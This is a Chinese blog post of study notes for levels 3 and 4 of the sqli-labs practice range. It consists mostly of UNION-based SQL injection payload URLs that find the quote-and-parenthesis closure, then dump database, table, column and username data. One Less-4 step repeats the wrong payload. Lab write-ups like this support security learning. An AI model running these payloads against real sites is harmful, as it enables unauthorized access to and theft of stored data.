sqli-labs靶场3~4笔记

Less-3

1.测试是否存在注入点:

复制代码
http://sqli-labs/Less-3/?id=1'

可以看出是单引号+小括号闭合。

复制代码
http://sqli-labs/Less-3/?id=1')--+

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-3/?id=') union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+

Less-4

1.测试是否存在注入点:

是双引号+小括号闭合

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+

总结

前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。

相关推荐
RainCity4 天前
Java Swing 自定义组件库分享(十二)
java·笔记·后端
LinXunFeng11 天前
Obsidian - 使用 Share Note 分享笔记并自部署
前端·笔记·github
闪闪发亮的小星星16 天前
高斯光以及高斯光公式解释
笔记
cqbzcsq16 天前
CellFlow虚拟细胞论文阅读
论文阅读·人工智能·笔记·学习·生物信息
阿米亚波16 天前
【Windows】QEMU 启动 openEuler aarch64/arm64 架构系统 + 离线软件源
linux·windows·经验分享·笔记·架构·arm
自传.16 天前
尚硅谷 Vibe Coding|第三章(1) Claude Code深度使用与进阶技巧 学习笔记
笔记·学习·尚硅谷·vibecoding
.千余16 天前
【C++】模板进阶全解:非类型参数|全特化|偏特化|分离编译完全指南
开发语言·c++·笔记·学习·其他
自传.16 天前
尚硅谷 Vibe Coding|第二章 AI编程工具生态 学习笔记
笔记·学习·ai编程·尚硅谷·vibe coding
秋波。未央16 天前
Java Agent 开发 · Day 1 学习笔记(含作业完整标准答案)
java·笔记·学习
中屹指纹浏览器16 天前
2026指纹浏览器字体指纹、字体渲染偏差检测与全维度虚拟字体池搭建方案
经验分享·笔记